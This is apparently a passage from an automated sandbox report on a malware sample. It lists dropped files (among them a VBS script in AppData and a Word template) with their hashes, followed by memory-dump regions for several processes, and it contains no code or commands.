    • C:\Users\Admin\AppData\Local\Temp\{7D3B2A28-1A1C-4D6F-8E9C-042607B0808D}

      Filesize

      128KB

      MD5

      cfb2a6835e744529b1731491c8174245

      SHA1

      8fd382193c68cc2b2b53a429982b59fff1a88ed1

      SHA256

      296eff8cde2dab64da624f1cf7d8d11266c0457bce8fb334e3c5bce59833d768

      SHA512

      5897945bf1f6882e0020429653ec9d84125a20b5bd89407286527696c395d9342dbe4ed178694a823ddf826fb3fc66a46a83590094413246df41c0ec8429755e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      d4c5e79ca048d54358a608157a8b44ab

      SHA1

      77cc1a0f786c2f7693a7ff75bcaec26eba8d9b9c

      SHA256

      ec72fc3cc88b846370fe1d1d5433b57ddb17c52110346e97968873119227b150

      SHA512

      037e6496c1abae7a5184154e700fa7daf3e53c51465c961b6334b76268d622af99eeb12857cfaa9ab0b927f5d8adb68940ff85554f718c4cedd54df448273e44

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IHHPP129.txt

      Filesize

      71B

      MD5

      7bf3633684af71f75cf8e14a27833e39

      SHA1

      4b3ef162da7502b03f822cc727c2fe377063647b

      SHA256

      e2865a96b62f9215f78bb412a081cd3bb50d202f94f533da7971a0b39ebe939c

      SHA512

      cf0431532f8f918d000edcc4d8baa86f4fa7136f80d3745aad6014e8ecfd97b221a9954f56b0a4eeefa3cdcde89171ac144b174cceb1d1a2c160125e4f3e5b57

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      e6b119faa431d07efd41663704c161d4

      SHA1

      75eafe6e00bc7aab8f53eea338b8906e56aa3468

      SHA256

      d2eb3efc123846af8de9461cd1baf611ba7bb93fe655fe5dec85344fabae453f

      SHA512

      afd85b7efc37b14e38a2b65b6a18198fed6d691f28d492cab76ed790367fda8d0b7273a4638a8d66f06a2a8eff02535d734bed0b9e12463f60e385f894955c24

    • C:\Users\Admin\AppData\Roaming\pixelcreatedforkissinglove.vbs

      Filesize

      5KB

      MD5

      e6a0cfb0bb1713dba11e14c0615977d2

      SHA1

      2a7a1e1519085b6939fa225e90cd6e23a054c896

      SHA256

      aaed8e24ca09554c52a4172ba76d724581c6dab04e2153023b0485d898378a60

      SHA512

      9a9f7de58b9813c7193dbe6b510655d60cef1f7db4486e7255c48e7301a21b54c73b77e0cac12330c7c458f39a9e2cb8bfff56074fcb3b5fedf49f21256ddbad

    • memory/920-299-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/920-303-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/920-295-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/920-307-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/920-306-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/920-305-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/1036-293-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/1036-283-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/1036-286-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/1036-279-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/1036-294-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/1036-312-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/1036-277-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1056-235-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/1056-241-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/1056-238-0x0000000001CF0000-0x0000000001D30000-memory.dmp

      Filesize

      256KB

    • memory/1056-237-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/1056-236-0x0000000001CF0000-0x0000000001D30000-memory.dmp

      Filesize

      256KB

    • memory/1296-296-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1296-284-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1296-301-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1296-300-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1296-289-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1296-321-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1412-122-0x00000000029A0000-0x00000000029E0000-memory.dmp

      Filesize

      256KB

    • memory/1412-120-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/1412-229-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/1412-267-0x00000000029A0000-0x00000000029E0000-memory.dmp

      Filesize

      256KB

    • memory/1412-121-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/1412-123-0x00000000029A0000-0x00000000029E0000-memory.dmp

      Filesize

      256KB

    • memory/1412-270-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/1592-25-0x0000000003000000-0x0000000003002000-memory.dmp

      Filesize

      8KB

    • memory/1592-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1592-89-0x0000000071EBD000-0x0000000071EC8000-memory.dmp

      Filesize

      44KB

    • memory/1592-1-0x0000000071EBD000-0x0000000071EC8000-memory.dmp

      Filesize

      44KB

    • memory/1592-228-0x0000000071EBD000-0x0000000071EC8000-memory.dmp

      Filesize

      44KB

    • memory/1632-244-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-246-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-324-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-266-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-269-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-262-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-271-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-272-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-273-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-274-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-276-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-260-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-258-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1632-256-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-254-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-252-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-250-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-264-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-248-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-242-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/1632-319-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

    • memory/1632-314-0x0000000010000000-0x0000000010019000-memory.dmp

      Filesize

      100KB

    • memory/2688-90-0x0000000071EBD000-0x0000000071EC8000-memory.dmp

      Filesize

      44KB

    • memory/2688-24-0x0000000003650000-0x0000000003652000-memory.dmp

      Filesize

      8KB

    • memory/2688-22-0x0000000071EBD000-0x0000000071EC8000-memory.dmp

      Filesize

      44KB

    • memory/2688-223-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2688-224-0x0000000071EBD000-0x0000000071EC8000-memory.dmp

      Filesize

      44KB

    • memory/2688-20-0x000000002F6B1000-0x000000002F6B2000-memory.dmp

      Filesize

      4KB

    • memory/2932-133-0x0000000001CC0000-0x0000000001D00000-memory.dmp

      Filesize

      256KB

    • memory/2932-132-0x0000000001CC0000-0x0000000001D00000-memory.dmp

      Filesize

      256KB

    • memory/2932-131-0x0000000001CC0000-0x0000000001D00000-memory.dmp

      Filesize

      256KB

    • memory/2932-130-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/2932-129-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB

    • memory/2932-265-0x0000000069280000-0x000000006982B000-memory.dmp

      Filesize

      5.7MB